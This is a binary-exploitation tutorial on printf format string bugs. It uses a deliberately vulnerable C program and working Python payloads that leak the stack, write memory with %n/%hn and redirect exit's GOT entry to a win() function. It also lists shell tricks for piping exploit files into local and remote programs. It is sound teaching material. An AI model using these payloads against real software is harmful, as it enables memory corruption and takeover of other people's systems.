
Binary Exploitation - Format Strings


Format Strings

There are days in hacking when things don’t work as expected, and that’s what happened with our latest topic. So instead, we’ll look at a more historic topic: format string exploits.

The second half of the article is a quick reminder that there is more than one way to feed input to a program in bash.

Overview

https://cs155.stanford.edu/papers/formatstring-1.2.pdf

  • fprintf - prints to a FILE stream
  • printf - prints to stdout
  • sprintf - prints to a string
  • snprintf - prints to a string with length checking
  • setproctitle - set argv[]
  • syslog - output to syslog

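What they all have in common is that they take a format string. The format specifiers live in the format string argument (the first argument of printf; functions like fprintf or snprintf take a destination first), and the values they represent follow as additional arguments: char *buffer; printf("Test: %p", buffer);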

  • %s - string
  • %p - pointer
  • %d - decimal
  • %x - hexadecimal
  • %u - unsigned decimal
  • %n - stores the number of bytes written so far into an int *
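You can see %n in action without compiling anything. The following minimal sketch calls the C library's snprintf through Python's ctypes. It assumes Linux with glibc, since some C libraries refuse %n altogether. The format string and variable names are made up for illustration.

```python
import ctypes
import ctypes.util

# Assumes Linux/glibc; CDLL(None) falls back to the symbols already loaded
libc = ctypes.CDLL(ctypes.util.find_library("c") or None)

out = ctypes.create_string_buffer(64)
written = ctypes.c_int(-1)

# %x formats the value 10 as hex; %n stores the number of bytes written so far
# ("value=a " = 8 bytes) into the int that &written points to
libc.snprintf(out, len(out), b"value=%x %n", 10, ctypes.byref(written))

print(out.value)      # b'value=a '
print(written.value)  # 8
```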

If we provide more format specifiers than arguments, we can observe the following behaviour:

c

int a = 10;
int *b;                // uninitialized: holds whatever was on the stack
char *c = "mystring";
printf("%x %x %x %x  \n", a, b, c);   // four %x, but only three arguments
// Output:
// a 8048471 80484d0 1

Check the stack at the moment printf is called and notice: the first word is the return address, and the second one points to our format string.

gdb

$ x/6wx $esp
0xbfffef7c:     0x0804843d      0x080484d8      0x0000000a      0x08048471
0xbfffef8c:     0x080484d0      0x00000001
$ x/s 0x080484d8
0x080484d8:     "%x %x %x %x  \n"

The remaining four words are exactly the hex values printed by the four %x specifiers. The caller is responsible for supplying the proper number of arguments, so printf cannot tell that one is missing. As a result, there's no segfault or error. Like any other function call on 32-bit x86 (cdecl), all arguments are pushed onto the stack. In memory, the format string pointer comes first, followed by the arguments to be formatted.

For every missing argument, printf simply takes the next word down the stack.
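This behaviour can be modelled in a few lines. The toy sketch below assumes 32-bit x86 and supports only %x and %p. It treats the stack as a list of words and, like printf, never checks how many arguments were actually passed. simulate_printf is a hypothetical name, and the words are the ones from the gdb dump above.

```python
def simulate_printf(fmt: str, stack: list) -> str:
    """Toy model of printf on 32-bit x86 for %x and %p only.

    `stack` holds the 32-bit words that follow the format-string pointer,
    i.e. whatever printf treats as argument 1, 2, 3, ... whether or not the
    caller actually passed them.
    """
    out = []
    next_word = 0
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt) and fmt[i + 1] in "xp":
            word = stack[next_word]          # no argument count check: just the next word
            next_word += 1
            if fmt[i + 1] == "x":
                out.append(format(word, "x"))
            else:
                out.append(hex(word) if word else "(nil)")  # glibc prints NULL as (nil)
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


# The words after the format pointer in the gdb dump above
stack = [0x0000000A, 0x08048471, 0x080484D0, 0x00000001]
print(simulate_printf("%x %x %x %x", stack))   # a 8048471 80484d0 1
```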

Example 2:

c

int a = 10;
int *b;
char *c = "mystring";
// %#010x: 0x prefix, zero-padded to 10 chars (the 0 flag is undefined for %p)
printf("%#010x %#010x %#010x %#010x  \n", a, b, c);
// Output:
// 0x0000000a 0x08048471 0x080484d0 0x00000001

Chars that break puts, gets, scanf, printf

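puts and printf stop at a null byte, since they treat their input as a C string. gets and fgets stop at a newline (0x0a) but happily read null bytes. scanf with %s does not stop at null bytes, only at whitespace: 0x09-0x0d and 0x20.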
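When crafting a payload, it helps to check it against these rules before sending it. Here is a minimal sketch. The STOPPERS table simply encodes the paragraph above, and scanf's whitespace set assumes the C locale. bad_bytes is a hypothetical helper name. vuln.c below reads with fgets and then hands the buffer to printf, so a payload for it must pass both checks. Check the payload without the final newline that ends the fgets read.

```python
import struct

# Bytes at which each function stops (C locale assumed for scanf's whitespace)
STOPPERS = {
    "printf": {0x00},                                # end of the C string
    "puts": {0x00},
    "gets": {0x0A},                                  # newline ends the line; NULs are kept
    "fgets": {0x0A},
    "scanf": {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20},   # %s stops at whitespace
}


def bad_bytes(payload: bytes, *funcs: str) -> list:
    """Return (offset, byte) pairs that any of `funcs` would stop at."""
    stop = set().union(*(STOPPERS[f] for f in funcs))
    return [(i, b) for i, b in enumerate(payload) if b in stop]


print(bad_bytes(struct.pack("<I", 0x0804A048) + b"%4$n", "fgets", "printf"))  # []
print(bad_bytes(struct.pack("<I", 0x08040A00), "fgets", "printf"))           # [(0, 0), (1, 10)]
```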

Exploiting format strings

vuln.c

c

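// Assumed build: 32-bit, non-PIE, matching the 0x0804xxxx addresses below
// (e.g. gcc -m32 -no-pie vuln.c -o vuln_app)
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void win()
{
    char *flag = "You won. Here's your flag MFOX{I_Kn0w_Form4t_Str1ngs}";
    puts(flag);
    fflush(stdout);     // _exit() skips stdio cleanup, so flush by hand
    _exit(1);           // not exit(): that would loop once exit's GOT entry points here
}

void vuln() 
{
    char buffer[512];
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);     // the bug: user input is used as the format string
    exit(1);            // vuln() never returns, it calls exit() instead
}

int main(int argc, char **argv)
{
    vuln();
}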

Let’s alter the execution flow to get to the win() function.

  • vuln() reads user input from stdin into a 512-byte buffer
  • That buffer is then passed directly to printf as the format string
  • If we provide input like %x %x %x, printf prints the contents of the stack
  • What we haven’t covered yet: printf can also write to memory

To exploit, start simple:

python

buff  = ""
buff += "AAAA"
buff += " %p" * 10

print(buff)

As expected, we get seemingly random words from the stack. But can we also find the four A’s we put in? The buffer itself lives on the stack, so at some position we should see 0x41414141.
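Counting the words by hand gets tedious. Below is a minimal sketch of a hypothetical helper. It takes the line printed for the AAAA + " %p" * 10 input and returns the 1-based position of 0x41414141, which is the number to use with Direct Parameter Access. It assumes glibc's %p output, where a NULL pointer shows up as (nil). The sample line is made up, not real program output.

```python
def find_offset(leak: str, marker: int = 0x41414141):
    """Return the 1-based stack position at which `marker` shows up, or None."""
    words = leak.split()[1:]              # skip the echoed "AAAA"
    for pos, word in enumerate(words, start=1):
        if word != "(nil)" and int(word, 16) == marker:
            return pos
    return None


sample = "AAAA (nil) 0xf7fb5000 0x8048471 0x41414141 0x20702520"  # made-up line
print(find_offset(sample))   # 4
```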

Direct Parameter Access

http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  • Direct Parameter Access is a special format string syntax: %3$p prints the third argument formatted as a pointer.
  • So when we input AAAA %4$p we might get the output AAAA 0x41414141
  • Unfortunately, we cannot use AAAA %4$s to print the A’s as a string instead of hex; the app will just segfault

The reason: some format specifiers expect a pointer (pass by reference), while others expect the value itself (pass by value).
In C, pass by reference means passing a pointer to the data.

  • %s wants pass-by-reference: it treats the argument as a pointer and prints the string it points to, so %4$s tries to read from address 0x41414141. That’s a pointer we can’t supply - or can we?
    Sure enough, 0x41414141 likely isn’t a valid address. But we can put whatever address we want instead of AAAA
  • %n wants pass-by-reference too, and it writes to memory instead of reading.
    But: it needs an int * (like &target), that is, a pointer to a valid, writable memory location where the count is stored
  • %p wants pass-by-value: it prints the values on the stack directly
  • %d wants pass-by-value
  • %u wants pass-by-value
  • %x wants pass-by-value
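Putting the two observations together: if we replace AAAA with a real address, %4$s prints whatever string lives there. Here is a minimal sketch of a payload builder. It assumes, as in the text, that our buffer starts at stack position 4 on 32-bit x86. read_payload is a hypothetical helper. 0x080484d0 is simply the "mystring" address from the first example, used for illustration.

```python
import struct


def read_payload(addr: int, offset: int = 4) -> bytes:
    """Payload that makes printf print the C string stored at `addr`."""
    payload = struct.pack("<I", addr)                # the pointer %s will dereference
    payload += b"%" + str(offset).encode() + b"$s"   # use stack slot `offset` as that pointer
    if 0x00 in payload or 0x0A in payload:           # printf / fgets would cut it short
        raise ValueError("address contains a NUL or newline byte")
    return payload


print(read_payload(0x080484D0))   # b'\xd0\x84\x04\x08%4$s'
```

Write the bytes with sys.stdout.buffer.write(payload + b"\n") and pipe them into the program. printf then prints the four raw address bytes, followed by the string at that address.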

Use %n to change the value of a variable

In the vuln.c app above, we declared a global int target. If we provide the address of target to %n, we can change its value.

gdb

$ p &target
$1 = (<data variable, no debug info> *) 0x804a048 <target>

To exploit it, we put the address of target at the start of our input in the proper endianness: little-endian on x86.

python
import struct
import sys

target_addr = 0x804a048
buff  = b""
buff += struct.pack("<I", target_addr)  # little-endian; lands at the 4th position
buff += b" %p" * 3                      # consume positions 1-3, so the next
                                        # specifier uses our address (4th position)
buff += b"A" * 0x41                     # As %n writes "the number of bytes written"
buff += b"%n"                           # we try that way to write 0x41 to "target"
sys.stdout.buffer.write(buff + b"\n")   # raw bytes; print() would re-encode them

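But if we check in GDB, target is 0x64, not 0x41. %n counts everything printed so far, including the 4 address bytes and the output of the three %p. We adapt the exploit: Direct Parameter Access (%4$n) replaces the %p padding, and we subtract the bytes already written: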

python
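import struct
import sys

target_addr = 0x804a048
buff  = b""
buff += struct.pack("<I", target_addr)   # these 4 bytes already count for %n
buff += b"A" * (0x41 - len(buff))        # pad the count up to exactly 0x41
buff += b"%4$n"                          # write it via the address at position 4
sys.stdout.buffer.write(buff + b"\n")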

Back in GDB, p target finally shows 0x41, and we are close to the “write-what-where” condition. Yet writing a value like 0x8040000 this way would require printing about 134 million “A”s. This likely will kill everything else, including the terminal. :D

%n short writes

Using %hn, we write only 2 bytes (a short) at a time, so each write needs a count of at most 0xffff. With two writes, one to the address and one to the address + 2, we can still build a full 4-byte value. So, if we want to write 0x41414141 to address 0x08040102,
we need to

  • write 0x4141 to 0x8040102
  • write 0x4141 to 0x8040104

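Both halves are the same in that example, which hides a complication. So here is another example, where we want to write 0x41424344.

On little-endian x86, the low half 0x4344 belongs at target_addr and the high half 0x4142 at target_addr + 2. Here we first write 0x4344 and then 0x4142.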

python

import struct
import sys

target_addr = 0x804a048
target_addr_high = target_addr + 2

buff  = b""
buff += struct.pack("<I", target_addr)       # 4th parameter
buff += struct.pack("<I", target_addr_high)  # 5th parameter

count = 0x4344 - len(buff)

buff += b"%" + str(count).encode() + b"p"    # %17212p here
buff += b"%4$hn"                  # Direct Parameter Access, writing the value to
                                  # 2 bytes, to the location pointed to by the 4th
                                  # parameter on the stack

# count = 0x4142 - 0x4344         # intuitively we would try this, but we already
                                  # printed a lot of stuff we need to take into
                                  # account; "%-514p" still prints 514 chars
                                  # ('-' is a flag), resulting in target = 0x45464344
                                  # In short: we can't go lower than the first number.

count = 0x14142 - 0x4344          # Trick: add 0x10000 to the wanted value. %hn only
                                  # stores the low 2 bytes, so 0x14142 becomes 0x4142

buff += b"%" + str(count).encode() + b"p"
buff += b"%5$hn"                  # 5th parameter = target_addr_high

sys.stdout.buffer.write(buff + b"\n")

Result: target = 0x41424344
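You can check the arithmetic behind the trick without a debugger. The small model below makes two assumptions. First, each %<pad>p prints exactly |pad| characters, which holds as long as the width is at least the pointer's printed length (at most 10 characters on 32-bit). Second, %hn stores the running count modulo 0x10000. simulate_hn and read_u32 are hypothetical names. A negative pad models the "%-514p" that the naive calculation produces.

```python
def simulate_hn(already_written: int, steps: list) -> dict:
    """Model a chain of "%<pad>p%<k>$hn" pairs.

    already_written: bytes printed before the first pair (the packed addresses)
    steps: (pad, addr) tuples; returns {addr: 16-bit value stored by %hn}
    """
    count = already_written
    memory = {}
    for pad, addr in steps:
        count += abs(pad)                # '-' is a flag, the width is still |pad|
        memory[addr] = count & 0xFFFF    # %hn keeps only the low 16 bits
    return memory


def read_u32(memory: dict, addr: int) -> int:
    """Combine the two little-endian halves at addr and addr + 2."""
    return memory[addr] | (memory[addr + 2] << 16)


target = 0x0804A048
good = simulate_hn(8, [(0x4344 - 8, target), (0x14142 - 0x4344, target + 2)])
naive = simulate_hn(8, [(0x4344 - 8, target), (0x4142 - 0x4344, target + 2)])
print(hex(read_u32(good, target)))    # 0x41424344
print(hex(read_u32(naive, target)))   # 0x45464344
```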

To actually make something useful out of it, we could:

  • Overwrite the return address with the address of the win() function (w/o ASLR). Note that vuln() itself never returns, because it calls exit(1)
  • Place shellcode in the environment variables (those are on the stack, too!) and then use this address (w/o ASLR, and only with an executable stack)
  • Overwrite the GOT address of another function, e.g. exit(), with the address of win(). exit() is exactly what vuln() calls right after printf
  • Overwrite destructor entries like .dtors (.fini_array on modern toolchains) https://www.win.tue.nl/~aeb/linux/hh/formats-teso.html

python
import struct
import sys

win_addr = 0x80484eb               # look up all addresses in GDB or objdump; they
                                   # stay fixed as long as the binary is not PIE
                                   # (ASLR alone does not move them)
exit_GOT_addr = 0x804a01c
exit_GOT_addr_high = exit_GOT_addr + 2

buff  = b""
buff += struct.pack("<I", exit_GOT_addr_high)   # 4th parameter: high half
buff += struct.pack("<I", exit_GOT_addr)        # 5th parameter: low half

count = (win_addr >> 16) - len(buff)            # 0x0804 - 8 bytes already printed

buff += b"%" + str(count).encode() + b"p"
buff += b"%4$hn"                   # first we write the high bytes (the smaller half)

count = (win_addr & 0xffff) - (win_addr >> 16)  # then the low bytes: 0x84eb - 0x804
                                   # if your calculation is off, go trial-and-error
                                   # with GDB and adjust

buff += b"%" + str(count).encode() + b"p"
buff += b"%5$hn"                   # 5 = the 5th parameter, i.e. the second packed
                                   # address (exit_GOT_addr)

sys.stdout.buffer.write(buff + b"\n")
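Both examples follow the same recipe. Split each 4-byte value into two halves, pack the addresses, and emit the writes in increasing order of value so the count only ever has to grow. Below is a minimal sketch of a generic builder under the same assumptions: 32-bit x86, addresses at the start of the buffer, and the first address at stack position `offset`. build_hn_payload is a hypothetical name. It pads with %<n>c instead of %<n>p, a common choice because %c with a width prints exactly that many characters.

```python
import struct


def build_hn_payload(writes: dict, offset: int) -> bytes:
    """Format string that stores each {addr: 32-bit value} with two %hn writes."""
    halves = []
    for addr, value in writes.items():
        halves.append((value & 0xFFFF, addr))             # low half -> addr
        halves.append(((value >> 16) & 0xFFFF, addr + 2)) # high half -> addr + 2
    halves.sort()                                         # smallest value first

    payload = b"".join(struct.pack("<I", addr) for _, addr in halves)
    count = len(payload)                                  # bytes printed so far
    for i, (half, _) in enumerate(halves):
        pad = (half - count) % 0x10000                    # wrap around instead of going negative
        if pad:
            payload += b"%" + str(pad).encode() + b"c"
        payload += b"%" + str(offset + i).encode() + b"$hn"
        count += pad
    return payload


# Same target as above: exit@GOT -> win()
payload = build_hn_payload({0x0804A01C: 0x080484EB}, offset=4)
```

As before, write the result with sys.stdout.buffer.write(payload + b"\n") and pipe it into the program. Several targets work the same way, as long as the payload fits into the 512-byte buffer.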

http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
https://medium.com/@airman604/protostar-format-4-walkthrough-b8f73f414e59

Reminder: cat trick

If we manage to spawn a shell (e.g. because win() already calls one) but stdin is closed as soon as our payload has been read, we can use cat to keep stdin open and forward our keyboard input:

bash
   $ (cat exploit.bin; cat) | ./vuln_app
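The same trick can be scripted in Python, e.g. when the payload is generated on the fly. Here is a minimal sketch, assuming a Unix-like system. send_then_forward is a hypothetical helper. It writes the payload to the program's stdin and then keeps forwarding our own stdin until EOF (Ctrl-D), just like the second cat.

```python
import subprocess
import sys


def send_then_forward(cmd, payload: bytes, src=None, chunk_size: int = 4096) -> int:
    """Like `(cat exploit.bin; cat) | cmd`: send payload, then forward src until EOF."""
    if src is None:
        src = sys.stdin.buffer              # our terminal, like the second cat
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE)
    try:
        proc.stdin.write(payload)
        proc.stdin.flush()
        while True:
            data = src.read1(chunk_size)    # returns as soon as some data is available
            if not data:                    # EOF (Ctrl-D)
                break
            proc.stdin.write(data)
            proc.stdin.flush()
    except BrokenPipeError:
        pass                                # the program exited before we finished
    finally:
        try:
            proc.stdin.close()
        except BrokenPipeError:
            pass
    return proc.wait()
```

For example, send_then_forward(["./vuln_app"], open("exploit.bin", "rb").read()) behaves like the one-liner above.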

As we learned in pwn.college, there are at least a dozen more ways to accomplish the same thing, and usually one of them works.

It’s impossible to cover over 1000 challenges, and everything we learned from the greatest course in history, in a few lines. We just tried to compile a bread-and-butter list: each trick makes sense in certain situations, surely not in all.

Utilizing FIFO for Input Redirection

Create a FIFO to send input to your application, emulating interactive stdin behavior in a scriptable manner.

bash
   $ mkfifo myfifo; cat exploit.bin > myfifo & ./vuln_app < myfifo

Leveraging tee for Output Inspection

Use tee alongside cat to inspect the payload being sent to the application, useful for debugging complex inputs.

bash
   $ (cat exploit.bin; cat) | tee debug_output.bin | ./vuln_app

Employing socat for Advanced I/O Redirection

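socat can create more complex bidirectional pipes. The first command runs the app on a pty connected to our terminal. The second serves it as a network service on port 1234, which is handy for testing remote-style exploits locally.

bash
   $ socat - EXEC:'./vuln_app',pty
   $ socat TCP-LISTEN:1234,reuseaddr,fork EXEC:'./vuln_app'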

Using tail -f for Persistent Input

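tail -f /dev/null never exits and never writes anything. Placed after the payload, it keeps the pipe open indefinitely, like cat. Unlike cat, it doesn’t forward your keyboard input, which is useful when the process only needs to stay alive after receiving the payload.

bash
   $ (cat exploit.bin; tail -f /dev/null) | ./vuln_app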

Redirecting with echo and cat

Combine echo with cat for situations where initial setup commands are followed by a need for persistent stdin.

bash
   $ (echo "initial command"; cat) | ./vuln_app

Combining cat with nc for Network Interaction

When dealing with network sockets, nc (netcat) combined with cat can be used to interact with remote services. The second cat keeps the connection open for interaction after the payload has been sent.

bash
   $ (cat exploit.bin; cat) | nc target.com 1234

Scripting Interaction with Python

Python’s subprocess module can script interaction with processes, offering a programmable alternative to cat.

python
import subprocess
process = subprocess.Popen(['./vuln_app'], stdin=subprocess.PIPE)
process.communicate(input=b'exploit data\n')

Redirecting input with Python for more control

Python can be used for more complex input redirection scenarios, especially when you need to process data before sending it.

python
import subprocess
with open('exploit.bin', 'rb') as f:
    subprocess.run(['./vuln_app'], stdin=f)

Executing with bash for dynamic command execution

Use bash -c to dynamically construct and execute commands, leveraging exec’s ability to replace the shell with a command or application.

bash

   $ bash -c 'exec ./vuln_app < <(cat exploit.bin)'

Piping into exec for inline execution

In a pipeline, each command already runs in its own subshell. So exec here replaces that subshell (not your interactive shell) with ./vuln_app, which then reads the payload from the pipe.

bash

   $ cat exploit.bin | exec ./vuln_app

Using exec with file descriptors

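Manipulate file descriptors directly with exec to redirect them before executing a command, which gives precise control over where data is sent and received. Note that the second exec replaces your current shell, so that shell is gone once ./vuln_app exits; run this in a script or subshell.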

bash

   $ exec 3< exploit.bin; exec ./vuln_app <&3

Exec and tee for live feedback

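Combine exec with tee and a process substitution to route the shell’s own stdout and stderr through tee. Everything printed afterwards, including the app’s output, then also ends up in a log file. This changes the current shell for the rest of the session.

bash

   $ exec > >(tee session.log) 2>&1; cat exploit.bin | ./vuln_app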

Using cat with FIFO for input redirection

Redirect stdin through a FIFO pipe to simulate live input or feed data progressively.

bash

   $ mkfifo mypipe
   $ cat exploit.bin > mypipe & ./vuln_app < mypipe

Using expect for interactive applications

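expect is a tool for automating interactive applications by simulating a tty. Inside the single quotes, bash does not expand $(cat ...), so the payload is read with Tcl itself. Everything goes through a pty, so control and non-ASCII bytes may not arrive unchanged; this works best for text payloads.

bash

   $ expect -c 'spawn ./vuln_app; set f [open exploit.bin]; fconfigure $f -translation binary; send -- [read $f]; close $f; interact'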

Sending signals with kill and trap

Combine cat with kill to send signals based on content read, useful for triggering actions in a program.

bash

   $ cat signal_trigger.txt | while read line; do kill -"$line" $(pidof vuln_app); done

Combining echo and redirection for simple payloads

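For smaller, simpler payloads, echo combined with shell redirection can be effective. /dev/tcp/host/port is a bash feature, not a real file, that opens a TCP connection. -n stops echo from appending an extra newline, and HTTP/1.1 requires a Host header.

bash

   $ echo -ne "GET / HTTP/1.1\r\nHost: localhost\r\n\r\n" > /dev/tcp/localhost/80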